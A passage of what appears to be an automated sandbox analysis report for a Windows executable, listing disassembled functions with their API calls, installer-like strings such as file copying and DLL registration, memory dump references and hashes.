                                                                                                                                              • Instruction Fuzzy Hash: 95D0C934E487688BCBE4DB00C8857E8B739EB95712F2082E6909E66260DF701EC6CF01
                                                                                                                                              Function 00409A65 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 1dc31577b986d824ade95fff7c23ca0874cd8e7894de531ceb1573817e2cca04
                                                                                                                                              • Instruction ID: 713af2a74f578950d3ef6b9bcb030b6e7d225ccb29fc3f0653117ab54aca20c7
                                                                                                                                              • Opcode Fuzzy Hash: 1dc31577b986d824ade95fff7c23ca0874cd8e7894de531ceb1573817e2cca04
                                                                                                                                              • Instruction Fuzzy Hash: 38D0E974D083298BDBE89B00D8957D8B735AB44711F1440E9D54E66390DF701EC4CF06

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 00413910 Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 166memorythreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ImpersonateSelf.ADVAPI32(00000002,?,?), ref: 00413967
                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00413974
                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?), ref: 0041397B
                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 00413985
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 0041399C
                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?), ref: 004139A3
                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004139C8
                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000014,?,?), ref: 004139DA
                                                                                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,?), ref: 004139F0
                                                                                                                                              • GetLengthSid.ADVAPI32(?,?,?), ref: 00413A02
                                                                                                                                              • LocalAlloc.KERNEL32(00000040,-00000010,?,?), ref: 00413A13
                                                                                                                                              • InitializeAcl.ADVAPI32(00000000,-00000010,00000002,?,?), ref: 00413A2A
                                                                                                                                              • AddAccessAllowedAce.ADVAPI32(00000000,00000002,00000003,?,?,?), ref: 00413A48
                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,?), ref: 00413A60
                                                                                                                                              • SetSecurityDescriptorGroup.ADVAPI32(00000000,?,00000000,?,?), ref: 00413A75
                                                                                                                                              • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000,?,?), ref: 00413A82
                                                                                                                                              • IsValidSecurityDescriptor.ADVAPI32(00000000,?,?), ref: 00413A89
                                                                                                                                              • AccessCheck.ADVAPI32(00000000,?,00000001,?,?,00000014,?,?,?,?), ref: 00413AC8
                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 00413AD2
                                                                                                                                              Strings
                                                                                                                                              • AccessCheck() failed with error %lu, xrefs: 00413AD9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DescriptorSecurity$Initialize$AccessAllocCurrentErrorLastLocalOpenProcessThreadToken$AllocateAllowedCheckDaclGroupImpersonateLengthOwnerSelfValid
                                                                                                                                              • String ID: AccessCheck() failed with error %lu
                                                                                                                                              • API String ID: 1643233394-3122912231
                                                                                                                                              • Opcode ID: 15af52b6dc6585a8aaa5b1198cb4af8417f1577e0f23ce853e5bded0e1c0e001
                                                                                                                                              • Instruction ID: 6636ee4da2cd74bfd359609ec80115f8e5afcf80bc05880448599f8d891f14b3
                                                                                                                                              • Opcode Fuzzy Hash: 15af52b6dc6585a8aaa5b1198cb4af8417f1577e0f23ce853e5bded0e1c0e001
                                                                                                                                              • Instruction Fuzzy Hash: 4D515E75A00208ABEB10DFE5DC89FEFBBB8AF46741F044029F605A6280D7B949458B66
                                                                                                                                              Function 00409F7A Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 278fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00409FA9
                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0040A018
                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040A02A
                                                                                                                                                • Part of subcall function 00414A00: FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 00414A1D
                                                                                                                                                • Part of subcall function 00414A00: FindClose.KERNEL32(00000000), ref: 00414A39
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A047
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040A056
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0040A0C5
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1B8
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040A1C7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirst$AttributesNext
                                                                                                                                              • String ID: %s\%s$%s\*_inst.exe$Copy %s->%s$Exit runGameSpecificExe$Looking for %s$exec: %s with commandline '%s'$runGameSpecificExe
                                                                                                                                              • API String ID: 4025586506-1506763675
                                                                                                                                              • Opcode ID: e2e9ab5ccb90d6f9dd843bbe4941d007a6a10c0c1eed867c47787b405c742b8f
                                                                                                                                              • Instruction ID: d2b54da0a6a615d98c4bb7f4e3ad910886c78d04fea921c7db62d1ad87df31e2
                                                                                                                                              • Opcode Fuzzy Hash: e2e9ab5ccb90d6f9dd843bbe4941d007a6a10c0c1eed867c47787b405c742b8f
                                                                                                                                              • Instruction Fuzzy Hash: D7A1D8B2108344ABD724DF60CC45FEB73ACEB84704F44492EB98957181DB79A74DCB6A
                                                                                                                                              Function 004151A0 Relevance: 33.5, APIs: 11, Strings: 8, Instructions: 282fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000), ref: 004151FB
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00415213
                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0041521E
                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00415232
                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0041523A
                                                                                                                                              • CopyFileA.KERNEL32(?,?,?), ref: 0041524E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesFind$CloseCopyErrorFirstLast
                                                                                                                                              • String ID: "%s"$/s /regserver$MyCopyFile$dll$exe$exec: %s /s %s$exec: %s /s /regserver %s$ocx
                                                                                                                                              • API String ID: 3483889725-3576774900
                                                                                                                                              • Opcode ID: e506baffcbc136c6131d4a1c8671d6fc93e4fe8248ca6c74d0802763e75e9641
                                                                                                                                              • Instruction ID: 60f35962d690970186fbe8e082cbe82d24c67d20d37591994032dbb9b5c60f80
                                                                                                                                              • Opcode Fuzzy Hash: e506baffcbc136c6131d4a1c8671d6fc93e4fe8248ca6c74d0802763e75e9641
                                                                                                                                              • Instruction Fuzzy Hash: C5A14871508740BBE320DB60CC45FEB77A8ABC9705F04465EFE8957282DB789984CB6E
                                                                                                                                              Function 00413E20 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 242sleepprocessfileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000400,?,?,?,?,?,0040B0FB,?,?,?,00000000,00000001,?,?,ask For CD - working dir,00000000), ref: 00413E61
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,?,0040B0FB,?,?,?,00000000,00000001,?,?,ask For CD - working dir,00000000,00404385), ref: 00413E88
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,?,0040B0FB,?,?,?,00000000,00000001,?,?,ask For CD - working dir,00000000,00404385), ref: 00413EA4
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00413EB8
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00414023
                                                                                                                                              • CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000030,00000000,00000000,0045E440,0045E484,?,?,00000000), ref: 0041405B
                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0041407C
                                                                                                                                              • Sleep.KERNEL32(00000001,?,?,00000000), ref: 00414098
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 004140DD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory$FindProcess$CloseCodeCreateErrorExitFileFirstLastSleep
                                                                                                                                              • String ID: "%s"$CreateProcess$Error executing '%s'%s$Exec And Wait
                                                                                                                                              • API String ID: 3676699910-1096974953
                                                                                                                                              • Opcode ID: 47fab39d792b6b31dfce4871978132716f4f91e3c138206beb0a83e96ad15d9d
                                                                                                                                              • Instruction ID: 0d36562a55edf719c25e91f2d3ffa3eb5e978c8fbce3c5ea020dbcf3caa10d05
                                                                                                                                              • Opcode Fuzzy Hash: 47fab39d792b6b31dfce4871978132716f4f91e3c138206beb0a83e96ad15d9d
                                                                                                                                              • Instruction Fuzzy Hash: 8081E271248341ABD320DF60DC45FEBB7A8EBC5B01F10491EFA8497280DBB99985CB5B
                                                                                                                                              Function 00414A00 Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 164sleepfileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 00414A1D
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414A39
                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?), ref: 00414B6C
                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00414C0C
                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 00414C16
                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00414C2A
                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00414C31
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesFindSleep$CloseDeleteFirst
                                                                                                                                              • String ID: "%s"$/s /UnregServer$/u /s$Remove$dll$exe$exec: %s /s /UnregServer %s$exec: %s /u /s %s$ocx
                                                                                                                                              • API String ID: 207913334-4138445747
                                                                                                                                              • Opcode ID: 7a27dd3ebb5889da30f2015b03362f2696fb5ccc79fbbb6d7542e5a1d3043de9
                                                                                                                                              • Instruction ID: 569dca1f961776a68051f51d760419570266c25ba139ecdaab2e0422a95345d3
                                                                                                                                              • Opcode Fuzzy Hash: 7a27dd3ebb5889da30f2015b03362f2696fb5ccc79fbbb6d7542e5a1d3043de9
                                                                                                                                              • Instruction Fuzzy Hash: 345159B12843446BE224EB558C42FEB339CAFD5704F44491EFA88931C2EF7C954987AE
                                                                                                                                              Function 00415E70 Relevance: 25.2, Strings: 20, Instructions: 220COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
